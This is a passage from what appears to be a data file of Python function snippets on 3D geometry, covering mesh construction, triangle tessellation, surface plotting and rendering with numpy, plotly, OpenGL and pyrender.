print(surface_x)\n # print(surface_y)\n # print(surface_z)\n xyz = np.reshape(xyz, (-1, 3))\n print(xyz.shape)\n x, y, z = xyz[:, 0], xyz[:, 1], xyz[:, 2]\n ax.scatter(x, y, z)\n # ax.plot_trisurf(\n # x, y, z,\n # cmap = plt.get_cmap('viridis'),\n # linewidth = 0,\n # antialiased = True,\n # )\n # ax.plot_surface(surface_x, surface_y, surface_z, rstride = 1, cstride = 1)\n # ax.plot_trisurf(surface_x, surface_y, surface_z)\n # ax.plot_trisurf(surface_x, surface_y, surface_z, **CURVE_KWARGS)\n\n ax.axis('off')\n\n ax.view_init(elev = 45, azim = 0) # note that this resets ax.dist to 10, so we can't use it below\n ax.dist = 7.5 # default is 10, so zoom in a little because there's no axis to take up the rest of the space\n\n plt.show()\n utils.save_current_figure(**kwargs)\n\n ### ANIMATION ###\n\n frames = length * fps\n\n writer = anim.writers['ffmpeg'](fps = fps, bitrate = 2000) # don't need a very high bitrate\n\n def animate(frame):\n print(frame, frames, frame / frames)\n ax.azim = 360 * frame / frames # one full rotation\n return [] # must return the list of artists we modified (i.e., nothing, since all we did is rotate the view)\n\n ani = anim.FuncAnimation(fig, animate, frames = frames, blit = True)\n ani.save(f\"{os.path.join(kwargs['target_dir'], kwargs['name'])}.mp4\", writer = writer)\n\n plt.close()", "def get3D_rod():\n\n volume = torch.zeros(1,1,55,54,53)\n length = 15\n st = [27,26,25]\n\n 
volume[:,:,st[0]:st[0]+length,st[1],st[2]] = 0.5\n volume[:,:,st[0]+length:st[0]+length+2,st[1],st[2]] = 0.2\n\n volume[:,:,st[0],st[1]:st[1]+length,st[2]] = 0.5\n volume[:,:,st[0],st[1]+length:st[1]+length+2,st[2]] = 1.\n \n volume[:,:,st[0],st[1],st[2]:st[2]+length] = 0.5\n volume[:,:,st[0],st[1],st[2]+length:st[2]+length+2] = 2.0\n \n volume[:,:,st[0],st[1]:st[1]+length,st[2]:st[2]+length] = 0.2\n volume[:,:,st[0],st[1]+length:st[1]+length+1,st[2]+length:st[2]+length+1] = 1.5\n\n return volume", "def three_dimensional(self, z): # Maybe I misunderstood the task. My method looks weird\n return (self.x, self.y, z)", "def get_num_vertices(triangles):\n return numpy.amax(numpy.reshape(triangles, -1)) + 1", "def surface_equ_3d_jit(polygon_surfaces):\n # return [a, b, c], d in ax+by+cz+d=0\n # polygon_surfaces: [num_polygon, num_surfaces, num_points_of_polygon, 3]\n surface_vec = polygon_surfaces[:, :, :2, :] - polygon_surfaces[:, :, 1:3, :]\n # normal_vec: [..., 3]\n normal_vec = np.cross(surface_vec[:, :, 0, :], surface_vec[:, :, 1, :])\n d = np.einsum('aij, aij->ai', normal_vec, polygon_surfaces[:, :, 0, :])\n return normal_vec, -d", "def cell_edges3d(self, axis2, axis3):\n shape = (self.size, axis2.size, axis3.size)\n vertices = np.zeros(shape).tolist()\n faces = np.zeros(shape).tolist()\n edge1 = self.cell_edges\n edge2 = axis2.cell_edges\n edge3 = axis3.cell_edges\n for i, row in enumerate(vertices):\n for j, col in enumerate(row):\n for k, _ in enumerate(col):\n vertices[i][j][k] = [\n (edge1[i], edge2[j], edge3[k]), (edge1[i + 1], edge2[j], edge3[k]),\n (edge1[i + 1], edge2[j + 1], edge3[k]), (edge1[i], edge2[j + 1], edge3[k]),\n (edge1[i], edge2[j], edge3[k + 1]), (edge1[i + 1], edge2[j], edge3[k + 1]),\n (edge1[i + 1], edge2[j + 1], edge3[k + 1]), (edge1[i], edge2[j + 1], edge3[k + 1])]\n faces[i][j][k] = [(0, 3, 2), (0, 2, 1), (4, 5, 6), (4, 6, 7),\n (2, 3, 7), (2, 7, 6), (4, 7, 3), (4, 3, 0),\n (0, 1, 5), (0, 5, 4), (1, 2, 6), (1, 6, 5)]\n return vertices, faces", "def get_triangles( self, N ):\n\n # store N as an instance variable\n self.N = N\n\n # initialize array to store locations of points for all triangles in the\n # tessellation sequence\n self.triangles = np.zeros( ( self.N, 3, 2 ) )\n\n # define points of the first triangle in the tessellation sequence\n point_c = np.array( [ 0, 0 ] )\n point_b = self.a * np.array( [ np.cos( self.C ), np.sin( self.C ) ] )\n point_a = np.array( [ self.b, 0 ] )\n\n # stack the points into a single array of shape (3, 2 )\n triangle = np.vstack( [ point_c, point_b, point_a ] )\n\n # loop over the number of triangles in the sequence\n for i in range( self.N ):\n\n # store the points of the i-th triangle in the array\n self.triangles[ i ] = triangle\n\n # compute the next triangle in the tessellation sequence\n triangle = self.next_triangle( triangle = triangle )\n\n # shift the next triangle in the tessellation sequence such that its\n # point C is in the same location as point B of the previous triangle\n triangle += ( self.triangles[ i - 1, 1 ] - self.triangles[ 0, 0 ] )", "def trisurf(\n x,\n y,\n z,\n simplices,\n show_colorbar,\n edges_color,\n scale,\n colormap=None,\n color_func=None,\n plot_edges=False,\n x_edge=None,\n y_edge=None,\n z_edge=None,\n facecolor=None,\n):\n # numpy import check\n if not np:\n raise ImportError(\"FigureFactory._trisurf() requires \" \"numpy imported.\")\n points3D = np.vstack((x, y, z)).T\n simplices = np.atleast_2d(simplices)\n\n # vertices of the surface triangles\n tri_vertices = points3D[simplices]\n\n 
# Define colors for the triangle faces\n if color_func is None:\n # mean values of z-coordinates of triangle vertices\n mean_dists = tri_vertices[:, :, 2].mean(-1)\n elif isinstance(color_func, (list, np.ndarray)):\n # Pre-computed list / array of values to map onto color\n if len(color_func) != len(simplices):\n raise ValueError(\n \"If color_func is a list/array, it must \"\n \"be the same length as simplices.\"\n )\n\n # convert all colors in color_func to rgb\n for index in range(len(color_func)):\n if isinstance(color_func[index], str):\n if \"#\" in color_func[index]:\n foo = clrs.hex_to_rgb(color_func[index])\n color_func[index] = clrs.label_rgb(foo)\n\n if isinstance(color_func[index], tuple):\n foo = clrs.convert_to_RGB_255(color_func[index])\n color_func[index] = clrs.label_rgb(foo)\n\n mean_dists = np.asarray(color_func)\n else:\n # apply user inputted function to calculate\n # custom coloring for triangle vertices\n mean_dists = []\n for triangle in tri_vertices:\n dists = []\n for vertex in triangle:\n dist = color_func(vertex[0], vertex[1], vertex[2])\n dists.append(dist)\n mean_dists.append(np.mean(dists))\n mean_dists = np.asarray(mean_dists)\n\n # Check if facecolors are already strings and can be skipped\n if isinstance(mean_dists[0], str):\n facecolor = mean_dists\n else:\n min_mean_dists = np.min(mean_dists)\n max_mean_dists = np.max(mean_dists)\n\n if facecolor is None:\n facecolor = []\n for index in range(len(mean_dists)):\n color = map_face2color(\n mean_dists[index], colormap, scale, min_mean_dists, max_mean_dists\n )\n facecolor.append(color)\n\n # Make sure facecolor is a list so output is consistent across Pythons\n facecolor = np.asarray(facecolor)\n ii, jj, kk = simplices.T\n\n triangles = graph_objs.Mesh3d(\n x=x, y=y, z=z, facecolor=facecolor, i=ii, j=jj, k=kk, name=\"\"\n )\n\n mean_dists_are_numbers = not isinstance(mean_dists[0], str)\n\n if mean_dists_are_numbers and show_colorbar is True:\n # make a colorscale from the colors\n colorscale = clrs.make_colorscale(colormap, scale)\n colorscale = clrs.convert_colorscale_to_rgb(colorscale)\n\n colorbar = graph_objs.Scatter3d(\n x=x[:1],\n y=y[:1],\n z=z[:1],\n mode=\"markers\",\n marker=dict(\n size=0.1,\n color=[min_mean_dists, max_mean_dists],\n colorscale=colorscale,\n showscale=True,\n ),\n hoverinfo=\"none\",\n showlegend=False,\n )\n\n # the triangle sides are not plotted\n if plot_edges is False:\n if mean_dists_are_numbers and show_colorbar is True:\n return [triangles, colorbar]\n else:\n return [triangles]\n\n # define the lists x_edge, y_edge and z_edge, of x, y, resp z\n # coordinates of edge end points for each triangle\n # None separates data corresponding to two consecutive triangles\n is_none = [ii is None for ii in [x_edge, y_edge, z_edge]]\n if any(is_none):\n if not all(is_none):\n raise ValueError(\n \"If any (x_edge, y_edge, z_edge) is None, \" \"all must be None\"\n )\n else:\n x_edge = []\n y_edge = []\n z_edge = []\n\n # Pull indices we care about, then add a None column to separate tris\n ixs_triangles = [0, 1, 2, 0]\n pull_edges = tri_vertices[:, ixs_triangles, :]\n x_edge_pull = np.hstack(\n [pull_edges[:, :, 0], np.tile(None, [pull_edges.shape[0], 1])]\n )\n y_edge_pull = np.hstack(\n [pull_edges[:, :, 1], np.tile(None, [pull_edges.shape[0], 1])]\n )\n z_edge_pull = np.hstack(\n [pull_edges[:, :, 2], np.tile(None, [pull_edges.shape[0], 1])]\n )\n\n # Now unravel the edges into a 1-d vector for plotting\n x_edge = np.hstack([x_edge, x_edge_pull.reshape([1, -1])[0]])\n y_edge = 
np.hstack([y_edge, y_edge_pull.reshape([1, -1])[0]])\n z_edge = np.hstack([z_edge, z_edge_pull.reshape([1, -1])[0]])\n\n if not (len(x_edge) == len(y_edge) == len(z_edge)):\n raise exceptions.PlotlyError(\n \"The lengths of x_edge, y_edge and \" \"z_edge are not the same.\"\n )\n\n # define the lines for plotting\n lines = graph_objs.Scatter3d(\n x=x_edge,\n y=y_edge,\n z=z_edge,\n mode=\"lines\",\n line=graph_objs.scatter3d.Line(color=edges_color, width=1.5),\n showlegend=False,\n )\n\n if mean_dists_are_numbers and show_colorbar is True:\n return [triangles, lines, colorbar]\n else:\n return [triangles, lines]", "def get_triangle(remote, objectid, triangleid):\n cmd1 = mmapi.StoredCommands()\n key1 = cmd1.AppendSceneCommand_GetTriangleIndices(objectid, triangleid)\n remote.runCommand(cmd1)\n t = mmapi.vec3i()\n cmd1.GetSceneCommandResult_GetTriangleIndices(key1, t)\n return (t.i, t.j, t.k)", "def get_volume_shape(self) -> Tuple[float, float, float]:\n image_shape = self.get_image_shape()\n if image_shape is not None:\n z = self.slice_array.get(\"lSize\", 0)\n return (*image_shape, z)", "def calc_surface(u, v):\n\n # # Wavy surface\n # surface = np.array([\n # u,\n # v,\n # np.exp(- (u**2 + v**2) / 30) * np.cos(np.sqrt(u**2 + v**2))\n # ])\n\n # Shere - {one_point}\n surface = np.array([\n 2 * u,\n 2 * v,\n 1 - u**2 - v**2\n ]) / (1 + u**2 + v**2)\n return (surface[0], surface[1], surface[2])", "def mesh_slice(V,n,X,Y,Z):\n from matplotlib import cm\n import mpl_toolkits.mplot3d.axes3d as p3\n import time\n order=np.array([(1,2,0),(2,0,1),(0,1,2)])\n q=np.transpose(V,(order[n])) # See projection for why we could also use take instead.\n if n==0: # Make a less cumbersome and more consistent version of this?\n i,j=X,Y\n i,j=np.array([i]),np.array([j]).T\n I,J=i,j\n for m in range(j.shape[0]-1): # -1 because we already have the first row as I.\n I=np.vstack((I,i))\n for m in range(i.shape[1]-1):\n J=np.hstack((J,j))\n if n==1:\n i,j=Y,Z\n i,j=np.array([i]),np.array([j]).T\n I,J=i,j\n for m in range(j.shape[0]-1): # -1 because we already have the first row as I.\n I=np.vstack((I,i))\n for m in range(i.shape[1]-1):\n J=np.hstack((J,j))\n if n==2:\n i,j=Z,X\n i,j=np.array([i]),np.array([j]).T\n I,J=i,j\n for m in range(j.shape[0]-1): # -1 because we already have the first row as I.\n I=np.vstack((I,i))\n for m in range(i.shape[1]-1):\n J=np.hstack((J,j))\n labels={\n 0:('horizontal axial (mm)','height (mm)'),\n 1:('horizontal radial (mm)','horizontal axial (mm)'),\n 2:('height (mm)','horizontal radial (mm)')\n } \n class animated(object): # 4D, plots f(x,y,z0) specific to mesh_slice.\n def __init__(self,I,J,q):\n self.fig = plt.figure()\n self.ax = self.fig.add_subplot(111, projection='3d')\n self.I,self.J=I,J\n self.q=q[:,0,:]\n self.surf=self.ax.plot_surface(self.J,self.I,self.q,cmap=cm.coolwarm,antialiased=False)\n def drawNow(self,ii,q,n):\n self.surf.remove()\n self.slc=q[:,ii,:]\n self.surf=self.ax.plot_surface(self.J,self.I,self.slc,cmap=cm.coolwarm,antialiased=False)\n plt.ylabel(labels[n][1])\n plt.xlabel(labels[n][0])\n #plt.title(ii) #Optional: this moves down during animation.\n plt.draw() # redraw the canvas\n time.sleep(0.01)\n self.fig.show()\n anim=animated(I,J,q)\n for ii in range(q.shape[1]):\n if ii==q.shape[1]-1:\n plt.title('Animation complete.')\n anim.drawNow(ii,q,n)\n return plt.show()", "def _fractal_triangle(self, p1: Point3D, p2: Point3D, p3: Point3D, depth: int):\n if depth == 0:\n height = (p1[1]+p2[1]+p3[1])/3\n if self._only_heightmap:\n 
self._heightmap[self._get_heightmap_key(p1,p2,p3)] = height\n else:\n if self._color_offset_heightmap is not None:\n height += self._color_offset_heightmap.get_height(p1, p2, p3)\n if height > self._snow_height:\n c = SNOW_COLOR\n elif height < self._tree_height:\n c = TREE_COLOR\n else:\n c = ROCK_COLOR\n self._triangles.append((p1, p2, p3, c))\n else:\n displace = depth <= self._noise_depth\n mid12 = self._get_midpoint(p1, p2, displace)\n mid23 = self._get_midpoint(p2, p3, displace)\n mid13 = self._get_midpoint(p3, p1, displace)\n self._fractal_triangle(p1, mid12, mid13, depth=depth-1)\n self._fractal_triangle(mid12, p2, mid23, depth=depth-1)\n self._fractal_triangle(mid13, mid23, p3, depth=depth-1)\n self._fractal_triangle(mid12, mid23, mid13, depth=depth-1)", "def extract_field_3D(u, grid_start, grid_end, grid_incr, depth):\n lon = np.arange(grid_start, grid_end, grid_incr)\n lat = np.arange(grid_start, grid_end, grid_incr)\n dep = np.arange(0, depth, grid_incr)\n u_field = np.empty([len(lon), len(lat), len(dep), 3])\n for x in range(len(lon)):\n for y in range(len(lat)):\n for z in range(len(dep)):\n try:\n u_field[x, y, z] = u.at([lon[x], lat[y], dep[z]])\n except PointNotInDomainError:\n u_field[x, y, z] = [0, 0, 0]\n return u_field", "def Triangle(self, c1=(0.,0.), c2=(0.,1.), c3=(1.,0.), npoints=10, element_type=\"tri\", equally_spaced=True):\n\n if not isinstance(c1,tuple) or not isinstance(c2,tuple) or not isinstance(c3,tuple):\n raise ValueError(\"The coordinates c1, c2 and c3 should be given in tuples of two elements each (x,y)\")\n\n npoints = int(npoints)\n\n\n npoints = npoints - 1\n if npoints < 0:\n npoints = 0\n\n c1 = np.array(c1); c2 = np.array(c2); c3 = np.array(c3)\n opoints = np.vstack((c1,c2,c3))\n oelements = np.array([[0,1,2]])\n\n if element_type==\"tri\":\n mesh = self.TriangularProjection(points=opoints, npoints=npoints, equally_spaced=equally_spaced)\n self.__update__(mesh)\n\n\n elif element_type == \"quad\":\n\n # SPLIT THE TRIANGLE INTO 3 QUADS\n omesh = Mesh()\n omesh.element_type=\"tri\"\n omesh.elements = oelements\n omesh.nelem = omesh.elements.shape[0]\n omesh.points = opoints\n omesh.GetBoundaryEdges()\n\n sys.stdout = open(os.devnull, \"w\")\n omesh.ConvertTrisToQuads()\n sys.stdout = sys.__stdout__\n\n\n npoints = int(npoints/2) + 1\n mesh = self.QuadrilateralProjection(points=omesh.points[omesh.elements[0,:],:],\n npoints=npoints, equally_spaced=equally_spaced)\n for i in range(1,omesh.nelem):\n mesh += self.QuadrilateralProjection(points=omesh.points[omesh.elements[i,:],:],\n npoints=npoints, equally_spaced=equally_spaced)\n\n self.__update__(mesh)", "def delaunay_triangle_calculation(rect, points):\n # creating the subdiv class\n subdiv = cv2.Subdiv2D(rect)\n\n # Insert points into subdiv class\n for p in points:\n subdiv.insert(p)\n\n triangle_list = subdiv.getTriangleList()\n\n delaunay_tri = []\n pt = []\n\n for t in triangle_list:\n pt.append((t[0], t[1]))\n pt1 = (t[0], t[1])\n\n pt.append((t[2], t[3]))\n pt2 = (t[2], t[3])\n\n pt.append((t[4], t[5]))\n pt3 = (t[4], t[5])\n\n if in_rectangle(rect, pt1) and in_rectangle(rect, pt2) and in_rectangle(rect, pt3):\n ind = []\n # Get face-points (from 68 face detector) by coordinates\n for j in range(0, 3):\n for k in range(0, len(points)):\n if abs(pt[j][0] - points[k][0]) < 1.0 and abs(pt[j][1] - points[k][1]) < 1.0:\n ind.append(k)\n\n if len(ind) == 3:\n delaunay_tri.append((ind[0], ind[1], ind[2]))\n\n pt = []\n\n return delaunay_tri", "def get_curve_3D(eig, alpha=0.25,g23=0.5,g12=0.5): # 
renumerated according to sato et al: l3 is smallest\n #return sato(eig,alpha,g23, g12)\n return frangi(eig)", "def render(self, scene):\n if self.degenerate:\n return\n # The number of subdivisions around the hoop's radial direction.\n if self.thickness:\n band_coverage = scene.pixel_coverage(self.pos, self.thickness)\n else:\n band_coverage = scene.pixel_coverage(self.pos, self.radius * 0.1)\n if band_coverage < 0:\n band_coverage = 1000\n bands = sqrt(band_coverage * 4.0)\n bands = clamp(4, bands, 40)\n # The number of subdivisions around the hoop's tangential direction.\n ring_coverage = scene.pixel_coverage(self.pos, self.radius)\n if ring_coverage < 0:\n ring_coverage = 1000\n rings = sqrt(ring_coverage * 4.0)\n rings = clamp(4, rings, 80)\n slices = int(rings)\n inner_slices = int(bands)\n radius = self.radius\n inner_radius = self.thickness\n\n # Create the vertex and normal arrays.\n vertices = []\n normals = []\n\n outer_angle_step = 2 * pi / (slices - 1)\n inner_angle_step = 2 * pi / (inner_slices - 1)\n outer_angle = 0.\n for i in range(slices):\n cos_outer_angle = cos(outer_angle)\n sin_outer_angle = sin(outer_angle)\n inner_angle = 0.\n for j in range(inner_slices):\n cos_inner_angle = cos(inner_angle)\n sin_inner_angle = sin(inner_angle)\n\n diameter = (radius + inner_radius * cos_inner_angle)\n vertex_x = diameter * cos_outer_angle\n vertex_y = diameter * sin_outer_angle\n vertex_z = inner_radius * sin_inner_angle\n\n normal_x = cos_outer_angle * cos_inner_angle\n normal_y = sin_outer_angle * cos_inner_angle\n normal_z = sin_inner_angle\n\n vertices.extend([vertex_x, vertex_y, vertex_z])\n normals.extend([normal_x, normal_y, normal_z])\n inner_angle += inner_angle_step\n outer_angle += outer_angle_step\n\n # Create ctypes arrays of the lists\n vertices = (gl.GLfloat *len(vertices))(*vertices)\n normals = (gl.GLfloat * len(normals))(*normals)\n\n # Create a list of triangle indices.\n indices = []\n for i in range(slices - 1):\n for j in range(inner_slices - 1):\n pos = i * inner_slices + j\n indices.extend([pos, pos + inner_slices, pos + inner_slices +\n 1])\n indices.extend([pos, pos + inner_slices + 1, pos + 1])\n indices = (gl.GLuint * len(indices))(*indices)\n\n # Compile a display list\n self.list = gl.glGenLists(1)\n gl.glNewList(self.list, gl.GL_COMPILE)\n self.color.gl_set(self.opacity)\n\n gl.glPushClientAttrib(gl.GL_CLIENT_VERTEX_ARRAY_BIT)\n gl.glEnableClientState(gl.GL_VERTEX_ARRAY)\n gl.glEnableClientState(gl.GL_NORMAL_ARRAY)\n self.model_world_transform(scene.gcf,\n Vector([self.radius, self.radius,\n self.radius])).gl_mult()\n\n gl.glVertexPointer(3, gl.GL_FLOAT, 0, vertices)\n gl.glNormalPointer(gl.GL_FLOAT, 0, normals)\n gl.glDrawElements(gl.GL_TRIANGLES, len(indices), gl.GL_UNSIGNED_INT,\n indices)\n gl.glPopClientAttrib()\n\n gl.glEndList()\n gl.glCallList(self.list)", "def is3_d(self):\n return self.container['is3_d']", "def parse_triangle(keyword_args, lineno=None):\n if keyword_args.get(\"text\") is None:\n keyword_args['text'] = \"triangle \" + keyword_args[\"name\"]\n keyword_args['type'] = \"polygon\"\n return parse_polygon(keyword_args, lineno=lineno)", "def mesh_preprocess(ver, tri):\n\n # TODO: Remove the type transform. 
Technically it does nothing\n ver_ravel = ver.ravel().astype('float32')\n tri_ravel = tri.ravel().astype('int32')\n n_vtx_coord = ver_ravel.shape[0]\n n_triangles = tri_ravel.shape[0]\n return ver_ravel, tri_ravel, n_vtx_coord, n_triangles", "def read_geometry(filepath, read_metadata=False, read_stamp=False):\n volume_info = OrderedDict()\n\n TRIANGLE_MAGIC = 16777214\n\n with open(filepath, \"rb\") as fobj:\n magic = _fread3(fobj)\n\n if magic == TRIANGLE_MAGIC: # Triangle file\n create_stamp = fobj.readline().rstrip(b'\\n').decode('utf-8')\n test_dev = fobj.peek(1)[:1]\n if test_dev == b'\\n':\n fobj.readline()\n vnum = np.fromfile(fobj, \">i4\", 1)[0]\n fnum = np.fromfile(fobj, \">i4\", 1)[0]\n coords = np.fromfile(fobj, \">f4\", vnum * 3).reshape(vnum, 3)\n faces = np.fromfile(fobj, \">i4\", fnum * 3).reshape(fnum, 3)\n\n if read_metadata:\n volume_info = _read_volume_info(fobj)\n else:\n raise ValueError(\"File does not appear to be a Freesurfer surface (triangle file)\")\n\n coords = coords.astype(np.float) # XXX: due to mayavi bug on mac 32bits\n\n ret = (coords, faces)\n if read_metadata:\n if len(volume_info) == 0:\n warnings.warn('No volume information contained in the file')\n ret += (volume_info,)\n if read_stamp:\n ret += (create_stamp,)\n\n return ret", "def get_mesh(self):\n tsdf_vol, color_vol = self.get_volume()\n\n # Marching cubes\n verts, faces, norms, vals = measure.marching_cubes_lewiner(tsdf_vol, level=0)\n verts_ind = np.round(verts).astype(int)\n verts = verts * self._voxel_size + self._vol_origin # voxel grid coordinates to world coordinates\n\n # Get vertex colors\n rgb_vals = color_vol[verts_ind[:, 0], verts_ind[:, 1], verts_ind[:, 2]]\n colors_b = np.floor(rgb_vals / self._color_const)\n colors_g = np.floor((rgb_vals - colors_b * self._color_const) / 256)\n colors_r = rgb_vals - colors_b * self._color_const - colors_g * 256\n colors = np.floor(np.asarray([colors_r, colors_g, colors_b])).T\n colors = colors.astype(np.uint8)\n return verts, faces, norms, colors", "def get_grid_mesh_volume(xs, ys, zs, vol_shape, s=1, include_borderline=True):\n\n xs, ys, zs = get_grid_mesh_coordinates(**locals())\n\n xdim, ydim, zdim = vol_shape\n vol = np.zeros((ydim, xdim, zdim), np.bool)\n xs = xs.astype(np.int)\n ys = ys.astype(np.int)\n zs = zs.astype(np.int)\n xs = xs[(xs >= 0) & (xs < xdim)]\n ys = ys[(ys >= 0) & (ys < ydim)]\n zs = zs[(zs >= 0) & (zs < zdim)]\n if include_borderline:\n if 0 not in xs:\n xs = np.r_[0, xs, xdim-1]\n else:\n xs = np.r_[xs, xdim-1]\n if 0 not in ys:\n ys = np.r_[0, ys, ydim-1]\n else:\n ys = np.r_[ys, ydim-1]\n if 0 not in zs:\n zs = np.r_[0, zs, zdim-1]\n else:\n zs = np.r_[zs, zdim-1]\n for y in ys:\n vol[y, xs, ::s] = 1\n vol[y, ::s, zs] = 1\n for x in xs:\n vol[ys, x, ::s] = 1\n vol[::s, x, zs] = 1\n for z in zs:\n vol[ys, ::s, z] = 1\n vol[::s, xs, z] = 1\n\n return vol", "def is3D(data):\n return data.find(\"x3\") != -1 and data.find(\"y3\") != -1 and data.find(\"z3\") != -1", "def gouraud_triangles(triangle_strip, vertex_vals, shape):\n triangle_strip = numpy.asarray(triangle_strip)\n vertex_vals = numpy.asarray(vertex_vals)\n assert triangle_strip.ndim == 2 and triangle_strip.shape[1] == 2 and len(triangle_strip) > 2\n unpack_out = False\n if vertex_vals.ndim == 1:\n vertex_vals = vertex_vals[:, numpy.newaxis]\n unpack_out = True\n assert len(vertex_vals) == len(triangle_strip)\n grid = numpy.indices(shape) + 0.5 # pixel centers are at (0.5, 0.5 geometrically)\n outputs = [numpy.zeros(shape) for i in range(vertex_vals.shape[1])]\n mask 
= numpy.zeros(shape, dtype=bool)\n for i in range(len(triangle_strip) - 2):\n vertices = triangle_strip[i:i+3]\n vals = vertex_vals[i:i+3]\n xmn, ymn = numpy.floor(vertices.min(axis=0)).astype(int)\n xmx, ymx = numpy.ceil(vertices.max(axis=0)).astype(int) + 1\n xs, ys = slice(xmn, xmx), slice(ymn, ymx)\n b_coords = barycentric_coords(vertices, grid[:, xs, ys])\n m = (b_coords >= 0).all(axis=0)\n mask[xs, ys] |= m\n b_m = b_coords[:, m]\n for j, out in enumerate(outputs):\n out[xs, ys][m] = vals[:, j].dot(b_m)\n if unpack_out:\n outputs = outputs[0]\n return mask, outputs", "def imshow_mesh_3d(img, vertices, faces, camera_center, focal_length, colors=(76, 76, 204)):\n H, W, C = img.shape\n if not has_pyrender:\n warnings.warn('pyrender package is not installed.')\n return img\n if not has_trimesh:\n warnings.warn('trimesh package is not installed.')\n return img\n try:\n renderer = pyrender.OffscreenRenderer(viewport_width=W, viewport_height=H)\n except (ImportError, RuntimeError):\n warnings.warn('pyrender package is not installed correctly.')\n return img\n if not isinstance(colors, list):\n colors = [colors for _ in range(len(vertices))]\n colors = [color_val(c) for c in colors]\n depth_map = np.ones([H, W]) * np.inf\n output_img = img\n for idx in range(len(vertices)):\n color = colors[idx]\n color = [(c / 255.0) for c in color]\n color.append(1.0)\n vert = vertices[idx]\n face = faces[idx]\n material = pyrender.MetallicRoughnessMaterial(metallicFactor=0.2, alphaMode='OPAQUE', baseColorFactor=color)\n mesh = trimesh.Trimesh(vert, face)\n rot = trimesh.transformations.rotation_matrix(np.radians(180), [1, 0, 0])\n mesh.apply_transform(rot)\n mesh = pyrender.Mesh.from_trimesh(mesh, material=material)\n scene = pyrender.Scene(ambient_light=(0.5, 0.5, 0.5))\n scene.add(mesh, 'mesh')\n camera_pose = np.eye(4)\n camera = pyrender.IntrinsicsCamera(fx=focal_length[0], fy=focal_length[1], cx=camera_center[0], cy=camera_center[1], zfar=100000.0)\n scene.add(camera, pose=camera_pose)\n light = pyrender.DirectionalLight(color=[1.0, 1.0, 1.0], intensity=1)\n light_pose = np.eye(4)\n light_pose[:3, 3] = np.array([0, -1, 1])\n scene.add(light, pose=light_pose)\n light_pose[:3, 3] = np.array([0, 1, 1])\n scene.add(light, pose=light_pose)\n light_pose[:3, 3] = np.array([1, 1, 2])\n scene.add(light, pose=light_pose)\n color, rend_depth = renderer.render(scene, flags=pyrender.RenderFlags.RGBA)\n valid_mask = (rend_depth < depth_map) * (rend_depth > 0)\n depth_map[valid_mask] = rend_depth[valid_mask]\n valid_mask = valid_mask[:, :, None]\n output_img = valid_mask * color[:, :, :3] + (1 - valid_mask) * output_img\n return output_img", "def surface(self):\n # return sum(np.outer(basis_function, control_point) for basis_function, control_point in zip(self.basis_1, self.basis)).T\n # return sum(np.outer(basis_function_1, self.control_net[ii, jj]) for ((ii, basis_function_1), (jj, basis_function_2)) in zip(enumerate(self.basis_1), enumerate(self.basis_2))).T\n # return sum(np.outer(basis_function_1, self.control_net[ii, jj]) + np.outer(basis_function_2, self.control_net[ii, jj]) for ((ii, basis_function_1), (jj, basis_function_2)) in zip(enumerate(self.basis_1), enumerate(self.basis_2))).T\n\n # x = np.zeros_like(self.xi_1_mesh)\n # y = np.zeros_like(self.xi_1_mesh)\n # z = np.zeros_like(self.xi_1_mesh)\n xyz = np.zeros((*self.xi_1_mesh.shape, 3))\n for (i, basis_function_i), (j, basis_function_j) in itertools.product(enumerate(self.basis_1), enumerate(self.basis_2)):\n print(i, basis_function_i)\n print(j, 
basis_function_j)\n print(self.control_net[i, j])\n # b1, b2 = np.meshgrid(basis_function_i, basis_function_j, indexing = 'ij')\n control_x, control_y, control_z = self.control_net[i, j]\n # print(b1.shape, b2.shape, np.array(self.control_net[i, j]).shape)\n # print((b1 * b2).shape)\n # z += np.outer(b1 * b2, self.control_net[i, j])\n # print(np.shape(z))\n print(np.outer(basis_function_i, basis_function_j))\n # x += np.outer(basis_function_i, basis_function_j) * control_x\n # y += np.outer(basis_function_i, basis_function_j) * control_y\n # z += np.outer(basis_function_i, basis_function_j) * control_z\n print(np.outer(basis_function_i, basis_function_j).shape)\n print(np.outer(np.outer(basis_function_i, basis_function_j), self.control_net[i, j]).shape)\n print(np.outer(np.outer(basis_function_i, basis_function_j), np.array(self.control_net[i, j])).shape)\n r = np.einsum('i,j,k->ijk', basis_function_i, basis_function_j, np.array(self.control_net[i, j]))\n print(r.shape)\n xyz += r\n\n # print(x, y, z)\n\n # return x, y, z\n return xyz", "def MeshPyTri(points,facets,*args,**kwargs):\n info = triangle.MeshInfo()\n info.set_points(points)\n info.set_facets(facets)\n\n return triangle.build(info,*args,**kwargs)", "def signed_tetrahedral_volume(p1, p2, p3):\n v321 = p3[..., 0] * p2[..., 1] * p1[..., 2]\n v231 = p2[..., 0] * p3[..., 1] * p1[..., 2]\n v312 = p3[..., 0] * p1[..., 1] * p2[..., 2]\n v132 = p1[..., 0] * p3[..., 1] * p2[..., 2]\n v213 = p2[..., 0] * p1[..., 1] * p3[..., 2]\n v123 = p1[..., 0] * p2[..., 1] * p3[..., 2]\n return (-v321 + v231 + v312 - v132 - v213 + v123) / 6.", "def get_grid_point_volume(xs, ys, zs, vol_shape, return_nz=False):\n\n xdim, ydim, zdim = vol_shape\n vol = np.zeros((ydim, xdim, zdim), np.bool)\n xs = xs.astype(np.int)\n ys = ys.astype(np.int)\n zs = zs.astype(np.int)\n xs = xs[(xs >= 0) & (xs < xdim)]\n ys = ys[(ys >= 0) & (ys < ydim)]\n zs = zs[(zs >= 0) & (zs < zdim)]\n gp_xs, gp_ys, gp_zs = np.meshgrid(xs, ys, zs, indexing='ij')\n gp_xyzs = np.c_[gp_xs.flatten(), gp_ys.flatten(), gp_zs.flatten()]\n vol[gp_xyzs[:,1], gp_xyzs[:,0], gp_xyzs[:,2]] = 1\n\n if return_nz:\n return vol, gp_xyzs\n else:\n return vol", "def boundary_triangles(TRI, boundary):\n # Look for triangles in TRI that contain 2 elements on the boundary\n # (ie they have a boundary edge in the triangle)\n inb0 = np.where(np.in1d(TRI[:, 0], boundary))[0]\n inb1 = np.where(np.in1d(TRI[:, 1], boundary))[0]\n inb2 = np.where(np.in1d(TRI[:, 2], boundary))[0]\n inb_all = np.hstack((inb0, inb1, inb2)).ravel()\n # print 'inb_all = ', inb_all\n\n # Look for indices that appear twice in cat( inb0,inb1,inb2).\n s = np.sort(inb_all, axis=None)\n btris = s[s[1:] == s[:-1]]\n\n # If any values are repeated in btri, that means all three vertices are boundary.\n # Keep these. 
